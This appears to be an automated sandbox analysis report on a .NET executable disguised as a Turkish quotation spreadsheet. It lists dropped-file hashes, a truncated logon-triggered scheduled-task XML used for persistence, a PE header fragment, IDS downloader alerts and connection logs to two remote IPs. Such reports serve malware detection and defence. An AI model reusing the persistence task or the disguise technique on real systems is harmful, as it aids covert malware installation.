                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1603
                                                                      Entropy (8bit):5.1311360692528805
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT3v
                                                                      MD5:F9609561E78DB7CBBD058C3A455961CB
                                                                      SHA1:59BD889F8C76EDCFAB72B4E3CF02914A2DFD4696
                                                                      SHA-256:906CD0BB10D5DE35C33D16A95704DDBA81D7E8D3F88A699E66DAC57411AF8867
                                                                      SHA-512:619AF7780291E716FF8EB4255C22EEBB96B64C01AFB1FFA1A5B4DE449CE04215B9C36998BF3CE0E73EA3AB8831BD26A46D06C0E22B133C6FE6CA7823E4C6D836
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                      Process:C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1603
                                                                      Entropy (8bit):5.1311360692528805
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT3v
                                                                      MD5:F9609561E78DB7CBBD058C3A455961CB
                                                                      SHA1:59BD889F8C76EDCFAB72B4E3CF02914A2DFD4696
                                                                      SHA-256:906CD0BB10D5DE35C33D16A95704DDBA81D7E8D3F88A699E66DAC57411AF8867
                                                                      SHA-512:619AF7780291E716FF8EB4255C22EEBB96B64C01AFB1FFA1A5B4DE449CE04215B9C36998BF3CE0E73EA3AB8831BD26A46D06C0E22B133C6FE6CA7823E4C6D836
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                                      Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):686592
                                                                      Entropy (8bit):7.9826379832319905
                                                                      Encrypted:false
                                                                      SSDEEP:12288:7nf0CC6f1ghqjmY+z40cZQT2R0Js0CI9KIvdosx6EJb5761F:7npC61lOz40gQT2SJM3+/pb5761
                                                                      MD5:2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
                                                                      SHA1:63918EF85E4EE9D01EDD4C0304E6F9682F90EE00
                                                                      SHA-256:C3BC0F624964EFBDB410648C80ED1357B28F293CE0D0C7602FCAE852E37AD918
                                                                      SHA-512:6B6B261E93450727198188C211FE1418F9BF2BABC02F47AE7797CAEDE6078F666EC38782C4BB3DE2D93D5D335BA8D27C8E198596754B1EC16583782BD37C0CD5
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..g..............0..p..........R.... ........@.. ....................................@.....................................O....................................y..T............................................ ............... ..H............text...Xo... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................1.......H.......<9...............g...............................................0..1........~.......o.........,...s.....~......o........+..*&.(......*B.(........}....*..{....*.0...........(.............o....*Z.(........(.......+..*r.(....-.~.....(....o....+..*....0..X.......s....%..o.....%..o.....%...o.....%..$o.....%..Ho.....%..o.....%..$o..........s.........*..{....*"..}....*.~....*.0..m........s....}.....(........o.....+5..( .......(!....+...(......("...o#......%.Y......-....($..
                                                                      Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.9826379832319905
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      File size:686'592 bytes
                                                                      MD5:2cc0d4388df2a7acfae0a9dc3cceb3b5
                                                                      SHA1:63918ef85e4ee9d01edd4c0304e6f9682f90ee00
                                                                      SHA256:c3bc0f624964efbdb410648c80ed1357b28f293ce0d0c7602fcae852e37ad918
                                                                      SHA512:6b6b261e93450727198188c211fe1418f9bf2babc02f47ae7797caede6078f666ec38782c4bb3de2d93d5d335ba8d27c8e198596754b1ec16583782bd37c0cd5
                                                                      SSDEEP:12288:7nf0CC6f1ghqjmY+z40cZQT2R0Js0CI9KIvdosx6EJb5761F:7npC61lOz40gQT2SJM3+/pb5761
                                                                      TLSH:0DE42305B714FD4BEE2F07F48CDFA6449A16916BCB21C94C9A2C28A55EFB2041353B9E
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..g..............0..p..........R.... ........@.. ....................................@................................
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x4a8f52
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67038278 [Mon Oct 7 06:40:56 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa8efd0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5a4.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa79040x54.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xa6f580xa700096c901a996bd1c190d045b6c6c94fcd8False0.9856234796032934data7.986844435005259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xaa0000x5a40x60021be40f2fc1313e9b49261bf8e62ab0bFalse0.4192708333333333data4.057251881026582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xac0000xc0x2003a3f54cfc8314b79017518344e239cc8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0xaa0900x314data0.43274111675126903
                                                                      RT_MANIFEST0xaa3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-07T14:52:22.045890+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749722132.226.247.7380TCP
                                                                      2024-10-07T14:52:23.327263+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749722132.226.247.7380TCP
                                                                      2024-10-07T14:52:23.791314+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749740188.114.96.3443TCP
                                                                      2024-10-07T14:52:24.606098+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749744132.226.247.7380TCP
                                                                      2024-10-07T14:52:26.327433+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749758132.226.247.7380TCP
                                                                      2024-10-07T14:52:27.061563+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749758132.226.247.7380TCP
                                                                      2024-10-07T14:52:27.624268+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749776188.114.96.3443TCP
                                                                      2024-10-07T14:52:27.627534+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749775188.114.96.3443TCP
                                                                      2024-10-07T14:52:28.436531+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749783132.226.247.7380TCP
                                                                      2024-10-07T14:52:29.764691+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749796132.226.247.7380TCP
                                                                      2024-10-07T14:52:30.226508+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749798188.114.96.3443TCP
                                                                      2024-10-07T14:52:30.327723+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749800188.114.96.3443TCP
                                                                      2024-10-07T14:52:31.531374+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749812188.114.96.3443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 7, 2024 14:52:21.137988091 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:21.143322945 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:21.143407106 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:21.143676996 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:21.149354935 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:21.797427893 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:21.803406000 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:21.808350086 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:22.005261898 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:22.045890093 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:22.055308104 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.055416107 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.055495977 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.063841105 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.063870907 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.748218060 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.748294115 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.753912926 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.753928900 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.754271984 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.826522112 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.871407986 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.958803892 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.958887100 CEST44349729188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:22.958964109 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.967751026 CEST49729443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:22.971702099 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:22.977102041 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:23.182259083 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:23.185911894 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.185964108 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.186072111 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.186479092 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.186491966 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.327263117 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.640510082 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.643194914 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.643224001 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.791274071 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.791358948 CEST44349740188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:23.791400909 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.792212009 CEST49740443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:23.794543982 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.795671940 CEST4974480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.799736023 CEST8049722132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:23.799832106 CEST4972280192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.800517082 CEST8049744132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:23.802581072 CEST4974480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.802640915 CEST4974480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:23.807357073 CEST8049744132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:24.447212934 CEST8049744132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:24.448478937 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:24.448575974 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:24.448775053 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:24.449050903 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:24.449089050 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:24.606097937 CEST4974480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:24.892640114 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:24.898387909 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:24.898482084 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:25.031671047 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:25.032248020 CEST44349748188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:25.032326937 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:25.032774925 CEST49748443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:25.038789988 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.043663025 CEST8049754132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.043740988 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.043914080 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.048831940 CEST8049754132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.225693941 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.230602026 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.230864048 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.231070042 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.235975027 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.713902950 CEST8049754132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.715217113 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:25.715249062 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:25.715431929 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:25.718517065 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:25.718534946 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:25.780289888 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.909573078 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:25.913847923 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:25.918852091 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.117898941 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.152400017 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.152515888 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.152596951 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.156739950 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.156764030 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.174084902 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.175909996 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.175939083 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.326824903 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.326929092 CEST44349762188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.327153921 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.327433109 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.327737093 CEST49762443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.328260899 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.328363895 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.331037998 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.332151890 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.336218119 CEST8049754132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.336268902 CEST4975480192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.337260008 CEST8049769132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.337443113 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.337510109 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.342271090 CEST8049769132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.616095066 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.616178989 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.618279934 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.618295908 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.618588924 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.679740906 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.727402925 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.799231052 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.799635887 CEST44349768188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:26.799699068 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.802819014 CEST49768443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:26.806149006 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:26.810969114 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:26.990237951 CEST8049769132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.010426998 CEST8049758132.226.247.73192.168.2.7
                                                                      Oct 7, 2024 14:52:27.011528015 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.011598110 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.011665106 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.011938095 CEST49775443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.011976004 CEST44349775188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.014014959 CEST49776443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.014056921 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.014121056 CEST49776443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.014461994 CEST49776443192.168.2.7188.114.96.3
                                                                      Oct 7, 2024 14:52:27.014480114 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.030292034 CEST4976980192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.061563015 CEST4975880192.168.2.7132.226.247.73
                                                                      Oct 7, 2024 14:52:27.492234945 CEST44349776188.114.96.3192.168.2.7
                                                                      Oct 7, 2024 14:52:27.494260073 CEST49776443192.168.2.7188.114.96.3
